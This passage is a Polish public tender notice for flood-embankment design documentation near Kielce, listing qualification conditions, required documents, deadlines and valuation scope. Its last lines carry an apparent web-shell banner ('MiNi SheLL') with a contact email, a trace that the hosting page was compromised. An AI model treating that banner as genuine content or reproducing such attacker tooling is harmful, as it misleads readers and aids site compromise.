Jeżeli miejsce poboru rezerw ziemnych będzie znajdować się w międzywalu, projekt zagospodarowania rezerw należy uzgodnić z RZGW.

K) Projekt podziału nieruchomości w formie operatu geodezyjnego podziału przedstawiającego podział działek niezbędnych dla wykonania obiektów budowlanych, zgodnie z ustawą z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. z 2010r., nr 143,                 poz. 963), który powinien zawierać:
a) mapy ewidencyjne zawierające projekty podziału nieruchomości oraz nieruchomości w całości wchodzące w zakres projektowanej inwestycji,
b) mapę ewidencyjną zawierającą projektowany obszar inwestycji z zaznaczeniem podziałów nieruchomości oraz nieruchomości wchodzące w całości w zakres projektowanej inwestycji, a także zaznaczony obszar zajęcia w sposób trwały i czasowy pod realizację tej inwestycji,
c) wykaz zmian gruntowych (zbiorczy),
d) wykaz synchronizacyjny (porównawczy, kataster-ewidencja),
e) kopię protokołów okazania granic (przekazanych do PODGiK),
f) badanie stanu prawnego wszystkich nieruchomości objętych projektem inwestycji (kopie decyzji, KW, kopie aktów notarialnych, itd.)

Dalsza część w sekcji IV. 4.16.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wymagania dotyczące wadium.

Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert, z uwzględnieniem 30-to dniowego terminu związania ofertą. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest poręczeniem pieniężnym,  gwarancjach bankowych lub ubezpieczeniowych, poręczeniach udzielonych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2007 Nr 42, poz.275 z późn. zm).

Wysokość wadium ustala się w kwocie 5 000,00 zł (słownie: pięć tysięcy zł 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	posiadania wiedzy i doświadczenia, w realizacji prac  odpowiadających przedmiotowi zamówienia tj.:

1.1.	Wykonania w ciągu ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na: opracowaniu co najmniej jednej dokumentacji w dziedzinie gospodarki wodnej, dotyczącej przebudowy, rozbudowy bądź budowy wałów przeciwpowodziowych (minimum klasy II), o wartości nie mniejszej niż  300 000,00 zł brutto 

Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty.

2.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1 muszą być:

2.1.	sporządzony przez Wykonawcę wykaz usług o których mowa w pkt 1 we wzorze stanowiącym załącznik nr 4 do SIWZ. W wykazie tym należy potwierdzić spełnienie wymogów określonych w pkt. 1.1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał. 

2.2.	dowody (poświadczenia) potwierdzające, że usługi przedstawione w wykazie  zrealizowanych usług zostały wykonane należycie. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - tj. 


1.1.	co najmniej jedną osobą z uprawnieniami do projektowania w specjalności: inżynieria wodna lub melioracje wodne albo konstrukcyjno-budowlanej w zakresie budowli hydrotechnicznych lub wodno-melioracyjnych; bez ograniczeń lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniejszych przepisów;

1.2.   co najmniej 1 osobą ds. z zakresu geodezji, z uprawnieniami w dziedzinie geodezji i kartografii w zakresie: rozgraniczanie i podziały nieruchomości (gruntów) oraz sporządzanie dokumentacji do celów prawnych.   

1.3.	co najmniej 1 rzeczoznawcą majątkowym posiadającym doświadczenie w wycenie nieruchomości dla inwestycji realizowanych zgodnie z ustawą z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych(Dz. U. z 2010r.nr 143 poz. 963).

Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty.

2.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1  muszą być: 

2.1.	Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniających wymagania określone w pkt. 1 we wzorze stanowiącym załącznik 
nr 2 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał.

2.2.	Do wykazu należy załączyć oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 3 do SIWZ.  Wymagana forma dokumentu - oryginał.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Inne dokumenty wymagane w postępowaniu przez Zamawiającego: 

1.1.	Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał.

1.2.	Oświadczenie z art. 36 ust. 4 ustawy we wzorze określonym w załączniku nr 5 do SIWZ. Wymagana forma dokumentu - oryginał.

1.3.	Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost 
z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się 
o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 

1.4.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie 
o udzielenie zamówienia, o którym mowa w rozdz. IX. Forma dokumentu oryginał lub kopia poświadczona notarialnie.

1.5.	W przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika ( wspólnika) umocowanego do takiej czynności. Warunek nie ma zastosowania w odniesieniu do spółek jawnych w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli).

1.6.	W przypadku  wykonywania dyspozycji pkt. 5 rozdz. VII SIWZ, czyli w sytuacji kiedy Wykonawca wykazując spełnianie warunków, udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Wykonawca w celu udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, załącza do oferty:

1.6.1.	pisemne zobowiązanie  podmiotów  do oddania Wykonawcy przez dany podmiot(y) do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wymagana forma dokumentu - oryginał.  

1.6.2.	dokumenty, o których mowa w par. 1 ust. 6 pkt 2  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 nr 0 poz. 231) 

-	Jeżeli zobowiązanie, o którym mowa w pkt. 1.6.1 w swojej treści wyczerpuje wszelkie przesłanki, o których mowa w par. 1, ust. 6, pkt 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013 nr 0 poz. 231) Wykonawca nie jest zobowiązany do przedkładania dokumentów, 
o których mowa w pkt. 1.6.2.

1.7.	Stosownie do art. 26 ust. 2d ustawy, listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - wg  wzoru określonego w załączniku nr 10 do SIWZ. Wymagana forma dokumentu - oryginał.  

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten składa każdy z Wykonawców osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia, które zostaną wprowadzone do treści umowy.

1.1.	Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy:

­	na warunkach §13 wzoru umowy stanowiącej załącznik nr 8 do SIWZ

2.	Wzór umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szmiuw.kielce.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 209.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2013 godzina 10:00, miejsce: Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, pok. 217 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> USŁUGI TOWARZYSZĄCE PRACOM PROJEKTOWYM:
1.	Uzyskanie ostatecznej decyzji o środowiskowych uwarunkowaniach. 
2.	Uzyskanie ostatecznej decyzji o pozwoleniu wodnoprawnym.
3.	Uzyskanie ostatecznej decyzji o warunkach prowadzenia robót - jeżeli będzie dotyczyć.
4.	Uzyskanie ostatecznej decyzji o pozwoleniu na realizację inwestycji zgodnie                     z ustawą z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz. U. z 2010r., nr 143, poz. 963);
5.	Uzyskanie innych nie wymienionych wyżej decyzji, o ile zajdzie taka potrzeba,                 w tym również pozwoleń/zgłoszeń dla ewentualnych kolizji z infrastrukturą techniczną.
Materiały niezbędne do wniosku o wydanie decyzji o  pozwoleniu na realizację inwestycji (wersja papierowa + wersja elektroniczna 1 egz. na nośniku DVD, pliki mapowe - pliki z rozszerzeniem pdf i dwg lub inne umożliwiające edycję), zgodnie z art. 6 ust.1 ustawy z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania inwestycji w zakresie budowli przeciwpowodziowych (Dz.U. z 2010 r. Nr 143, poz. 963 z późn. zm.) zawierające m.in.:
1. charakterystykę inwestycji określającą rodzaj budowli przeciwpowodziowej oraz jej lokalizację i parametry techniczne,
2. mapę w skali co najmniej 1:1 000 przedstawiającą projektowany obszar inwestycji z zaznaczeniem zbiorczej mapy projektu podziału geodezyjnego nieruchomości oraz terenu niezbędnego dla obiektów budowlanych oraz istniejące uzbrojenie terenu, a także wskazanie części nieruchomości będących częścią inwestycji, na której nie będą prowadzone roboty budowlane,
3. analizę powiązania inwestycji z mapami zagrożenia powodziowego, mapami ryzyka powodziowego, z planami zarządzania ryzykiem powodziowym (o ile zostały opracowane),
4. określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu,
5. opinie właściwych organów wymienionych w art. 6 ust.1 pkt.7 a - l w/w ustawy,
6. wskazanie nieruchomości w stosunku do których decyzja o pozwoleniu na realizację inwestycji ma wywołać skutek o którym mowa w art. 19 ust.4 ustawy tj. zatwierdzenie podziału nieruchomości,
7. wskazanie nieruchomości, o których mowa w art. 9 pkt. 5 lit. b w/w ustawy tj. nieruchomości lub ich części będących częścią inwestycji, niezbędnych do jej funkcjonowania, które nie stają się własnością Skarbu państwa albo jednostki samorządu terytorialnego, ale wobec których trwale ogranicza się sposób korzystania.
Obowiązkiem Wykonawcy jest także wykonanie innych opracowań poza wszystkimi w/w (w zależności od warunków stawianych przez uzgadniających). Wykonawca zobowiązany jest także czynnie włączać się w uzyskiwanie decyzji administracyjnych oraz natychmiastowo uzupełniać wnioski, operaty itp. - na każde wezwanie organów udzielających pozwoleń i Zamawiającego, w celu uzyskania pozwoleń i decyzji administracyjnych, do uzyskania decyzji o pozwoleniu na realizację inwestycji włącznie (Wykonawca zobowiązany jest do naniesienia zmian w dokumentacji, wymaganych przez organy administracji w toku postępowania o udzielenie decyzji o pozwoleniu na realizację inwestycji).
Po podpisaniu umowy na przedmiotowe zamówienie, Wykonawca otrzyma niezbędne upoważnienie (pełnomocnictwo) do reprezentowania i występowania w imieniu Zamawiającego w sprawach dotyczących projektowania.
Do wykonawcy zamówienia należeć będzie uzyskanie wszystkich niezbędnych danych do projektowania, opracowanie dokumentacji, wykonanie pomiarów geodezyjnych,                 w razie potrzeby uzyskanie wszelkich niezbędnych zgód właścicieli działek na wycinkę drzew i krzewów i innych w razie potrzeby do uzyskania decyzji na realizację inwestycji.

W  trakcie opracowania dokumentacji należy przeprowadzić reambulację projektu                    w terenie.

Zgodnie z art. 20 ust. 2 Prawa budowlanego projektant ma obowiązek zapewnić sprawdzenie projektu architektoniczno-budowlanego pod względem zgodności                         z przepisami, w tym techniczno - budowlanym i obowiązującymi normami przez osoby posiadające uprawnienia budowlane do projektowania bez ograniczeń w odpowiedniej specjalności lub przez rzeczoznawcę budowlanego. Powyższa zasada ma także zastosowanie w przypadku wykonanych projektów wykonawczych.
Projekt powinien zawierać klauzulę stwierdzającą kompletność opracowania i przydatność celowi, jakiemu ma służyć.

Projektant, a także sprawdzający do projektu budowlanego dołączają oświadczenie 
o sporządzeniu projektu budowlanego zgodnie z obowiązującymi przepisami oraz zasadami wiedzy technicznej.

Po przekazaniu Zamawiającemu dokumentacji wykonana zostanie opinia odnosząca się do zgodności wykonania w/w dokumentacji ze Specyfikacją Istotnych Warunków Zamówienia, a także obowiązującymi przepisami po opracowaniu której zwołane zostanie posiedzenie ZOPI. Obowiązkiem Wykonawcy będzie wprowadzenie ewentualnych uzupełnień i poprawek dokumentacji zgodnie z zaleceniami Zespołu Oceny Projektów Inwestycyjnych. 

Wykonawca w harmonogramie prac związanych z wykonaniem zamówienia winien uwzględnić czasookres niezbędny do zwołania i przeprowadzenia posiedzenia ZOPI (30 dni licząc od dnia przekazania Zamawiającemu kompletnej dokumentacji przez wykonawcę), jak również przeprowadzenia przez stosowny organ postępowania administracyjnego w celu wydania ostatecznej decyzji o pozwoleniu na realizację inwestycji - co powinno znaleźć odzwierciedlenie w harmonogramie rzeczowo - finansowym. Obowiązkiem Wykonawcy będzie wprowadzenie ewentualnych uzupełnień i poprawek dokumentacji zgodnie z zaleceniami Zespołu Oceny Projektów Inwestycyjnych. 

Zamawiający oczekuje ponadto, że wszelkie poprawki i uwagi wynikające z protokołu z posiedzenia ZOPI zostaną wprowadzone do projektu, a potwierdzeniem tego faktu będzie podpis koreferenta po naniesieniu poprawek (obowiązek uzyskania podpisu koreferenta leży po stronie Wykonawcy).  

-	Inne opracowania:
- Operat szacunkowy wyceny nieruchomości gruntowych przeznaczonych do przeniesienia tytułu własności na rzecz Skarbu Państwa i wypłaty odszkodowań właścicielom nieruchomości - 3 egz. 
Wyceny nieruchomości winny być sporządzone zgodnie z wymogami określonymi w:
- ustawie z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz.U. 2010 Nr 143, poz. 963) zgodnie z wymogami art. 21;
- ustawie z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jedn. Dz. U. z 2010 Nr 102, poz. 651 z późn. zm.),
- rozporządzeniu Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz.U. Nr 207, poz. 2109 z późn. zm.)
- standardach zawodowych rzeczoznawców majątkowych Polskiej Federacji Stowarzyszeń Rzeczoznawców Majątkowych.

Integralną częścią operatu szacunkowego wyceny nieruchomości gruntowych będzie zestawienie wartości działek obejmujące następujące dane:
-      liczba porządkowa,
-      właściciel, władający i jego adres,
-      bonitacja, użytek, klasa,
-      nr działki,
-      nr KW,
-      powierzchnia działki,
-      cena jednostkowa za 1m2,
-      cena działki do wykupu.

I.2. Zakres KPP zabezpieczenia terenu portu.
-	Cześć ogólna (opisowa):
1)	określenie przedmiotu i przewidywanych efektów realizowanej inwestycji,
2)	podstawy formalne i merytoryczne podjęcia przygotowania dokumentacyjnego inwestycji,
3)	dane dotyczące położenia inwestycji, z uwzględnieniem obszarów chronionych,
4)	zestawienie podstawowych danych technicznych i ekonomicznych charakteryzujących inwestycje,
5)	dane hydrologiczne, hydrograficzne, geologiczne, geologiczno-inżynierskie; 
6)	charakterystykę rolniczo-gospodarczą rejonu związanego z inwestycją,
7)	charakterystykę przyrodniczą rozpatrywanego obszaru,
8)	obliczenia hydrauliczne i hydrologiczne;
9)	podstawowe informacje o rozwiązaniach technicznych budowlanych, technologicznych, niezbędne do prawidłowego opracowania projektów budowlanego i wykonawczego - wariantowe przedstawienie proponowanych rozwiązań,
10)	informacje o wpływie proponowanych rozwiązań na środowisko,
11)	warunki realizacji inwestycji (metody realizacji), potrzeby terenowe wykonawcy, potrzeby wykonania innych dokumentacji t. j.: wodnoprawna, wywłaszczeniowa oraz dodatkowych uzgodnień i wymaganych decyzji oraz inwestycji towarzyszących lub współzależnych (w tym uzgodnienia z zainteresowanymi gminami i powiatami, zarządcami dróg, zarządcami sieci uzbrojenia terenu, zarządcami obszarów chronionych, itd.),
12)	harmonogram i ogólne wytyczne realizacji, obejmujące w szczególności koncepcję organizacji robót i zagospodarowania placu budowy, 
13)	zalecenia dotyczące eksploatacji inwestycji,
14)	bilans mas ziemnych, roboty przygotowawcze i budowle tymczasowe;
15)	ogólny szacunkowy koszt dla poszczególnych wariantów, opracowany na podstawie wskaźników,
16)	porównanie i uzasadnienie wyboru wariantu;
17)	zbiór uzgodnień formalnych dotyczących inwestycji (z zainteresowanymi gminami, zarządcami dróg, zarządcami sieci uzbrojenia terenu, zarządcami obszarów chronionych itp.),
18)	wykaz Polskich Norm i innych normatywów zastosowanych w rozwiązaniach.

-	Cześć graficzna:
1)	mapa poglądowa w skali 1:25 000, 
2)	mapa istniejących i projektowanych urządzeń wodnych (w skali 1:10 000),
3)	profil podłużny (w skali 1:100/10 000) z naniesionymi istniejącymi i projektowanymi urządzeniami, wykonany w oparciu o aktualne pomiary geodezyjne oraz przekroje poprzeczne w miejscach charakterystycznych;
4)	rzuty i przekroje głównych budowli (bez szczegółów i rysunków konstrukcyjnych), z podaniem rzędnych posadowienia;
5)	inwentaryzacja fotograficzna.

Projekt powinien być oparty o analizę planów zagospodarowania przestrzennego lub studium uwarunkowań i kierunków zagospodarowania gmin

I.	Termin wykonania zamówienia 

Termin wykonania zamówienia: do dnia 31-03-2015 r.

a)	termin do dnia 31-03-2015 r. obejmuje w szczególności: 
­	wykonanie i złożenie u Zamawiającego kompletnej dokumentacji 
­	uzyskanie przez Wykonawcę w imieniu Zamawiającego ostatecznej decyzji 
o pozwoleniu na realizację inwestycji.

Zamawiający zakłada, realizację przedmiotu zamówienia w cyklu trzyletnim tj.: od podpisania umowy z Wykonawcą w 2013 r. do dnia 31-03-2015 r.

Zamawiający na przedmiotowe zadanie posiada do wykorzystania w roku 2013 środki nie wyższe niż 100 000,00 zł brutto

Zamawiający wymaga, aby Wykonawca w terminie do dnia 20-12-2013 r. wykonał zakres prac przeznaczonych do zafakturowania na wartość nie mniejszą niż 30 % całkowitego wynagrodzenia Wykonawcy za wykonanie całego przedmiotu zamówienia ustalonego na podstawie rozstrzygniętego postępowania o udzielenie zamówienia publicznego,  jednak na wartość nie większą niż 100 000 zł brutto..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com